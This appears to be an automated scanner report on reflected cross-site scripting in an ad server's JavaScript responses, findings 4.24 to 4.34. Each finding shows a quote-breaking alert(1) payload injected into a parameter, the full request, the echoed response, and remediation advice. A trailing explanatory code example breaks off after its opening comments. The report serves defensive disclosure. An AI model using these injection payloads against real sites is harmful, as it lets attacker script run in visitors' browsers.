8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48242"-alert(1)-"d0ace12d614&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60
...[SNIP]...

4.24. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6ea6"-alert(1)-"8c77f1839e3 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptb6ea6"-alert(1)-"8c77f1839e3&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptb6ea6"-alert(1)-"8c77f1839e3&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fs
...[SNIP]...

4.25. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c87a2'-alert(1)-'1670f8dc654 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptc87a2'-alert(1)-'1670f8dc654&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptc87a2'-alert(1)-'1670f8dc654&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.26. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff51d'-alert(1)-'ce15ab17f86 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ff51d'-alert(1)-'ce15ab17f86&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ff51d'-alert(1)-'ce15ab17f86&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a
...[SNIP]...

4.27. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ece3a"-alert(1)-"92527edee20 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ece3a"-alert(1)-"92527edee20&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ece3a"-alert(1)-"92527edee20&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a
...[SNIP]...

4.28. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1264b'-alert(1)-'3e77e92286a was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=1264b'-alert(1)-'3e77e92286a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=1264b'-alert(1)-'3e77e92286ahttp://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.29. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3f4"-alert(1)-"ed84a2146c5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=aa3f4"-alert(1)-"ed84a2146c5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=aa3f4"-alert(1)-"ed84a2146c5http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "
...[SNIP]...

4.30. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52120"-alert(1)-"e9a993e1182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. Because even the name of a parameter the server does not know is reflected, the server appears to copy the click-through URL's query string into the script verbatim rather than rebuilding it from a fixed set of expected parameters, so no parameter-level filtering stands between the request and the script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&52120"-alert(1)-"e9a993e1182=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6713

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&52120"-alert(1)-"e9a993e1182=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

4.31. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eb3b'-alert(1)-'47541a30f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&1eb3b'-alert(1)-'47541a30f9f=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6713

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&1eb3b'-alert(1)-'47541a30f9f=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.32. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eab1c'-alert(1)-'f3739ac3557 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response. The label opzn&page is a scanner parsing artefact: opzn is a valueless parameter in the click-through URL and the payload is appended to the following page= value, as the request below shows.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryeab1c'-alert(1)-'f3739ac3557&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryeab1c'-alert(1)-'f3739ac3557&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-
...[SNIP]...

4.33. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec93"-alert(1)-"12a793669de was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response. As in 4.32, the label opzn&page is a scanner parsing artefact: opzn carries no value and the payload is appended to the page= value that follows it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfec93"-alert(1)-"12a793669de&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfec93"-alert(1)-"12a793669de&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-
...[SNIP]...

4.34. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e822"-alert(1)-"4c3ac561287 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, serialise it as a JavaScript string literal (backslash-escaping both quote characters and the backslash, and encoding angle brackets, ampersands and line terminators as \uXXXX sequences) at every point where it appears. Two caveats apply to this endpoint. First, the response is served as application/x-javascript rather than HTML, so the injected code runs only when a page includes the crafted URL through a script src tag, and it then executes with the privileges of that embedding page's origin. Second, the same parameter is reported once for the double-quote payload and once for the single-quote payload because the response echoes it in two string contexts: inside the single-quoted document.write('...') argument, where double quotes are backslash-escaped but single quotes are not, and inside a later double-quoted string, where double quotes survive unescaped. Each context needs its own encoding; a fix that handles only one of them leaves the other finding open.
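The following JavaScript is an added example, not DoubleClick's code or anything taken from the report. It reconstructs the pattern these findings describe with a hypothetical ad-server template (the function names, the example.invalid URL and the parameter layout are assumptions), pushes scanner-style markers through it with alert() stubbed, and shows that the marker breaks out of both a double-quoted and a single-quoted literal, generalising across the two quote styles the report alternates between, while a JSON-serialised literal with angle brackets, ampersands and line terminators escaped keeps the value inert.

```javascript
// Added example (not DoubleClick's or the report's code): why a "-alert(1)-"
// marker executes when a request value is pasted into a quoted JS string, and
// how to emit the value so that it cannot.

// Hypothetical ad-server template: the click-through URL built from request
// parameters is concatenated straight into a string literal; quote is the
// delimiter the template uses (the report shows both " and ' contexts).
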